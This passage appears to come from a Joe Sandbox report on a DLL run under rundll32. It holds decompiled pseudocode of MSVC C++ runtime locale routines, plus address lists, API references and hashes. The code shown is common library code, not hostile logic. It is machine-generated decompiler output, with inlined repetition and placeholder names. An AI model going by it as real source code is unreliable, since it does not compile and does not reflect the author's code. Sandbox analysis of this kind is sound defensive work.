																																											E6E2200AC(0x6e2683cf, _t513, _t688, _t705, 0x14);
																																											E6E206653(_t726 - 0x14, 0);
																																											_t706 =  *0x6e2c6dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6E1E161C(0x6e2c6d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6E2066BA(_t726 - 0x14);
																																												return E6E220075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6E211558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t726 - 0x20);
																																														E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t513, _t689, _t706, 0x14);
																																														E6E206653(_t726 - 0x14, 0);
																																														_t707 =  *0x6e2c6e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6E1E161C(0x6e2c6dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6E2066BA(_t726 - 0x14);
																																															return E6E220075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6E2115C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t726 - 0x20);
																																																	E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t513, _t690, _t707, 0x14);
																																																	E6E206653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6e2c6dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6E1E161C(0x6e2c6d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6E2066BA(_t726 - 0x14);
																																																		return E6E220075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6E21162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6E1E1438(_t625);
																																																				E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e26851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6e26c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6E21542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6E220075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6E206FD3(__eflags, _t691);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6e2c6dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6E206FD3(__eflags, _t690);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6e2c6e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6E206FD3(__eflags, _t689);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6e2c6dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6E206FD3(__eflags, _t688);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6e2c6dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6E206FD3(__eflags, _t687);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6e2c6de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6E206FD3(__eflags, _t686);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6e2c6ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6E206FD3(__eflags, _t685);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6e2c6db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6E206FD3(__eflags, _t684);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6e2c6dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6E206FD3(__eflags, _t683);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6e2c6dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6E206FD3(__eflags, _t682);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6e2c6dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6E206FD3(__eflags, _t681);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6e2c6df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6E206FD3(__eflags, _t680);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6e2c6df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6E206FD3(__eflags, _t679);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6e2c6dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6E206FD3(__eflags, _t678);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6e2c6df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6E206FD3(__eflags, _t677);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6e2c6dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6E206FD3(__eflags, _t676);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6e2c6dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

0x6e20f2cf
0x6e20f2cf
0x6e20f2d6
0x6e20f2e0
0x6e20f2e5
0x6e20f2f0
0x6e20f2f4
0x6e20f2f7
0x6e20f2fc
0x6e20f300
0x6e20f305
0x6e20f309
0x6e20f34e
0x6e20f351
0x6e20f35d
0x6e20f30b
0x6e20f30d
0x6e20f313
0x6e20f319
0x6e20f321
0x6e20f324
0x6e20f361
0x6e20f36f
0x6e20f374
0x6e20f37c
0x6e20f386
0x6e20f38b
0x6e20f396
0x6e20f39a
0x6e20f39d
0x6e20f3a2
0x6e20f3ab
0x6e20f3ad
0x6e20f3af
0x6e20f3f4
0x6e20f3f7
0x6e20f403
0x6e20f3b1
0x6e20f3b1
0x6e20f3b3
0x6e20f3b9
0x6e20f3bf
0x6e20f3c7
0x6e20f3ca
0x6e20f407
0x6e20f415
0x6e20f41a
0x6e20f422
0x6e20f42c
0x6e20f431
0x6e20f43c
0x6e20f440
0x6e20f443
0x6e20f448
0x6e20f451
0x6e20f453
0x6e20f455
0x6e20f49a
0x6e20f49d
0x6e20f4a9
0x6e20f457
0x6e20f457
0x6e20f459
0x6e20f45f
0x6e20f465
0x6e20f46d
0x6e20f470
0x6e20f4ad
0x6e20f4bb
0x6e20f4c0
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f7
0x6e20f4f9
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff
0x6e20f472
0x6e20f472
0x6e20f475
0x6e20f479
0x6e20f47d
0x6e20f48a
0x6e20f492
0x6e20f494
0x00000000
0x6e20f494
0x6e20f45b
0x6e20f45b
0x00000000
0x6e20f45b
0x6e20f459
0x6e20f3cc
0x6e20f3cc
0x6e20f3cf
0x6e20f3d3
0x6e20f3d7
0x6e20f3e4
0x6e20f3ec
0x6e20f3ee
0x00000000
0x6e20f3ee
0x6e20f3b5
0x6e20f3b5
0x00000000
0x6e20f3b5
0x6e20f3b3
0x6e20f326
0x6e20f326
0x6e20f329
0x6e20f32d
0x6e20f331
0x6e20f33e
0x6e20f346
0x6e20f348
0x00000000
0x6e20f348
0x6e20f30f
0x6e20f30f
0x00000000
0x6e20f30f
0x6e20f30d

APIs

__EH_prolog3.LIBCMT ref: 6E20F2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F2E0
int.LIBCPMT ref: 6E20F2F7

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F331
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F351
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F36F

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
Instruction ID: 10625688a95a7fcfc8cc82e3f48675f4d5747b483601fc92543ebc04cc0c7c02
Opcode Fuzzy Hash: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
Instruction Fuzzy Hash: A911E37591055D8FCF00DBE0C894AEEB77BBF44B19F240909E420AB2D0DFB4AA80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A1A5, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E6E20A1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t136 =  *0x6e2c6ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6E1E161C(0x6e2c6cb8);
				_t102 = _a8;
				_t50 = E6E1E171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t132, _t136, 0x14);
							E6E206653( &_v20, 0);
							_t137 =  *0x6e2c6cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6E1E161C(0x6e2c6cbc);
							_t109 = _a8;
							_t133 = E6E1E171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t99, _t133, _t137, 0x14);
										E6E206653( &_v20, 0);
										_t138 =  *0x6e2c6cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6E1E161C(0x6e2c6cc0);
										_t116 = _a8;
										_t134 = E6E1E171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6E1E1438(_t120);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6e26ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6E206FD3(__eflags, _t134);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6e2c6cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6E206FD3(__eflags, _t133);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6e2c6cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6E206FD3(__eflags, _t132);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6e2c6ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

0x6e20a1a5
0x6e20a1ac
0x6e20a1b6
0x6e20a1bb
0x6e20a1c6
0x6e20a1ca
0x6e20a1cd
0x6e20a1d2
0x6e20a1d6
0x6e20a1db
0x6e20a1df
0x6e20a224
0x6e20a227
0x6e20a233
0x6e20a1e1
0x6e20a1e3
0x6e20a1e9
0x6e20a1ef
0x6e20a1f7
0x6e20a1fa
0x6e20a237
0x6e20a245
0x6e20a24a
0x6e20a252
0x6e20a25c
0x6e20a261
0x6e20a26c
0x6e20a270
0x6e20a273
0x6e20a278
0x6e20a281
0x6e20a283
0x6e20a285
0x6e20a2ca
0x6e20a2cd
0x6e20a2d9
0x6e20a287
0x6e20a287
0x6e20a289
0x6e20a28f
0x6e20a295
0x6e20a29d
0x6e20a2a0
0x6e20a2dd
0x6e20a2eb
0x6e20a2f0
0x6e20a2f8
0x6e20a302
0x6e20a307
0x6e20a312
0x6e20a316
0x6e20a319
0x6e20a31e
0x6e20a327
0x6e20a329
0x6e20a32b
0x6e20a370
0x6e20a373
0x6e20a37f
0x6e20a32d
0x6e20a32d
0x6e20a32f
0x6e20a335
0x6e20a33b
0x6e20a343
0x6e20a346
0x6e20a380
0x6e20a383
0x6e20a391
0x6e20a396
0x6e20a39a
0x6e20a39e
0x6e20a3a3
0x6e20a3a6
0x6e20a3ad
0x6e20a348
0x6e20a348
0x6e20a34b
0x6e20a34f
0x6e20a353
0x6e20a360
0x6e20a368
0x6e20a36a
0x00000000
0x6e20a36a
0x6e20a331
0x6e20a331
0x00000000
0x6e20a331
0x6e20a32f
0x6e20a2a2
0x6e20a2a2
0x6e20a2a5
0x6e20a2a9
0x6e20a2ad
0x6e20a2ba
0x6e20a2c2
0x6e20a2c4
0x00000000
0x6e20a2c4
0x6e20a28b
0x6e20a28b
0x00000000
0x6e20a28b
0x6e20a289
0x6e20a1fc
0x6e20a1fc
0x6e20a1ff
0x6e20a203
0x6e20a207
0x6e20a214
0x6e20a21c
0x6e20a21e
0x00000000
0x6e20a21e
0x6e20a1e5
0x6e20a1e5
0x00000000
0x6e20a1e5
0x6e20a1e3

APIs

__EH_prolog3.LIBCMT ref: 6E20A1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A1B6
int.LIBCPMT ref: 6E20A1CD

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

